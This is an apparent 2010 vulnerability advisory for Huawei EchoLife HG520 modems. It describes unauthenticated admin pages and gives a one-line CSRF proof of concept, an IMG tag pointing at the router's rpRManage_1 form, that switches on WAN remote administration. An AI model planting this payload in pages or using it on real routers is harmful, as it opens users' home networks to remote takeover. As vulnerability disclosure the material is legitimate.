Huawei EchoLife HG520 RemoteManagement CSRF

Huawei EchoLife HG520 RemoteManagement CSRF

Posted on Jun 08 2010   |  Plain text version

Summary

Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration inerfaces on the WAN.

Description

=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================


Device: Huawei EchoLife HG520
Software Version: V100R001B021Telmex
V100R001B020Telmex
Firmware Version: 3.10.18.7-1.0.7.0 (latest version)
3.10.18.5-1.0.7.0
Vulnerable Models: HG520c
HG520b
Published date: 2010-04-00
Criticity: High
Impact: Enable remote admin on WAN
Location: Web interface (LAN/WAN)
Solution: Not available
Websec-id: ws10-12


DESCRIPTION
=======================
Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration inerfaces on the WAN.


EXPLOIT / POC
=======================
Enable FTP, TELNET and WEB by sending a request to:

http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Client-Side:

<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


SOLUTION
=======================
Not available.


DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered


REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Websec - http://websec.mx


Websec.mx

POC

<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


Latest Blog Entries

Panoptic
An overview of Panoptic, an open source penetration testing tool that automates the process of search and retrieval of common log and config files through LFI vulnerabilities.
Posted in panoptic python tool lfi

Special discount code for "Nmap 6: Network Exploration and Security Auditing Cookbook"
PacktPub created a special discount code for our friends from HackerHalted
Posted in Nmap Hacker Halted nmap cookbook

Mac2WepKey HHG5xx for iPhone
The famous app to obtain the default WiFi passwords for Huawei routers is now available for the iPhone iOS 5.
Posted in HHG5xx iPhone huawei mac2wepkey passwords generator

Latest News

Oct 12, 2012
Websec at Hacker Halted USA 2012
Hacker Halted USA 2012 will reunite information security specialists from around the world to show the latest and most innovating research in the field of information security.

Sep 27, 2012
Nmap 6: Network Exploration and Security Auditing Cookbook is now on pre-sale!
The book "Nmap 6: Network Exploration and Security Auditing Cookbook" by Paulino Calderón is now on pre-sale and will be available soon.